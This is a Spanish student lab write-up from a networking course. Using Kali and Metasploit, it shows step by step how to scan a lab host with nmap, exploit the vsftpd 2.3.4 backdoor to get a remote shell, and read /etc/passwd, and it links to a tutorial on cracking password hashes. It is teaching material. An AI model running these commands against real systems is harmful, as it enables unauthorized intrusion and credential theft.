EXPLOTACIÓN SISTEMA OPERATIVO
Miguel Ángel Marchal Barrera
Colegio ciudad de los muchachos SISTEMAS MICROINFORMÁTICOS Y REDES CURSO 2016/2017
IDENTIFICACIÓN DEL OBJETIVO
Comprobar si tenemos acceso a la máquina que queremos atacarComando ping + dirección del interfaz de redAbrir el terminal de Kali-linuxIntroducir: ping 192.168.1.104 (es la dirección del equipo a atacar)
Si tenemos conectividad no se perderá ningún paquete enviado
Detectar los equipos activos de la redComando nmap –sP + dirección de redIntroducir: nmap –sP 192.168.1.0/24
Escanea la red en busca de los equipos que están funcionando en la LAN mostrando las MAC y las direcciones IP de cada equipo.
PÁGINA 1|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
MAMB
MAMB
ANÁLISIS DE PUERTOS Y SERVICIOSIdentificación de puertos que usa la máquinaComando nmap –sT -O + dirección del interfaz de redIntroducir: nmap –sT -O 192.168.1.104
Muestra los puertos que utilizan la máquina y la versión del sistema operativo
PÁGINA 2|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
Comprobar versiones de serviciosComando nmap –sT –sV dirección del interfaz de redIntroducir: nmap –sT –sV 192.168.1.104
Muestra puertos abiertos, servicios y versiones de éstos.
Comprobar versiones de servicios mediante comando telnetComando telnet + IP del interfaz de red + puerto abiertoIntroducir: telnet 192.168.1.104 21
Muestra la versión del servicio del puerto seleccionado para saber si es posible que exista alguna vulnerabilidad en la versión.
PÁGINA 3|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
MAMB
Conexión a través del servicio seleccionadoComando telnet, FTP y SSHAcceso con comando telnetComando telnet + IP interfaz de redIntroducir: telnet 192.168.1.104
Accedemos a la máquina y muestra el interfaz de texto pidiendo login desconocido.
Acceso con comando FTPComando ftp + IP interfaz de redIntroducir: ftp 192.168.1.104
Acceso mediante servicio ftp pidiendo contraseña desconocida.
Acceso con comando SSHComando ssh + IP interfaz de redIntroducir: ssh 192.168.1.104
Acceso mediante servicio ssh pidiendo contraseña desconocida.
PÁGINA 4|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
MAMB
MAMB
ANÁLISIS DE VULNERABILIDADESHerramienta metasploitIniciar la herramienta introduciendo: msfconsole
Comprobar los exploits de la versión que pueden hacer vulnerable el acceso por el servicioIntroducir comando: search ftp
Lista de exploits que podemos utilizar para acceder de modo remoto a la máquina que queremos atacar.
PÁGINA 5|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
MAMB
EXPLOTACIÓN DE VULNERABILIDADESLocalizamos el xploit preparado para atacar
Este exploit nos informa que es excelente para usar.
Para usar el xploitComando use + dirección del exploitIntroducir: use exploit/unix/ftp/vsftpd_234_backdoor
Comprobar la configuración de parámetrosComando show optionsIntroducir: show options
Se comprueba si se necesita alguna configuración adicional para usar el exploit, necesitaremos configurar el RHOST asignando la IP de la máquina atacada.RHOST: Remote Host.RPORT: Remote Port.
Configuración RHOSTComando set RHOST + dirección del interfaz de redIntroducir: set RHOST 192.168.1.104
PÁGINA 6|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
MAMB
MAMB
MAMB
Buscar payload disponible
Comando show payloadsIntroducir: show payloads
Muestra el disponible
Utilizar el payload disponibleComando set payload + payload disponibleIntroducir: set payload cmd/unix/interact
Acceder remotamente a la máquinaComando exploitIntroducior: exploit
Acceso permitido remoto a la máquina atacada.Con este último comando habremos accedido a la máquina finalmente, sin necesidad de login de ningún tipo y se podrá acceder a los directorios y archivos de manera transparante.
PÁGINA 7|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
MAMB
MAMB
POST-EXPLOTACIÓN DEL SISTEMAUso de comandos como si estuviéramos en la misma máquina.Comando ls
Directorios de la raíz de la máquina atacada.
PÁGINA 8|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
Obtención de contraseñaComando catIntroducir: cat etc/passwd
La estructura es:<nombre>,<password><uid>, <gid>,<descripción opcional> <carpeta>, <shell><nombre>: Nombre de usuario.<password>: Si es igual a “x” la contraseña está almacenada en /etc/shadow, si es igual a “!” el usuario está bloqueado y si es igual a “!!” no tiene contraseña.<uid>: Número de identificador, para root 0, para los demás un número entre 1 y 65535.<gid>: Grupo al que está asignado.<descripción opcional>: Descripción añadida al perfil de usuario.<carpeta>: Carpeta de inicio de usuario de cada usuario.<shell>: Intérprete de línea de comandos de Linux.
Con esto no descifraremos la contraseña, sólo veremos los usuarios configurados, ésta está alojada en etc/shadow y está encriptada, para
PÁGINA 9|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS
MAMB
ello existen herramientas y tutoriales paso a paso para descifrarlas, en este link se explica cómo.https://www.youtube.com/watch?v=DntHkcbq-wY
PÁGINA 10|9MIGUEL ÁNGEL MARCHAL BARRERA 2SMR C.MUCHACHOS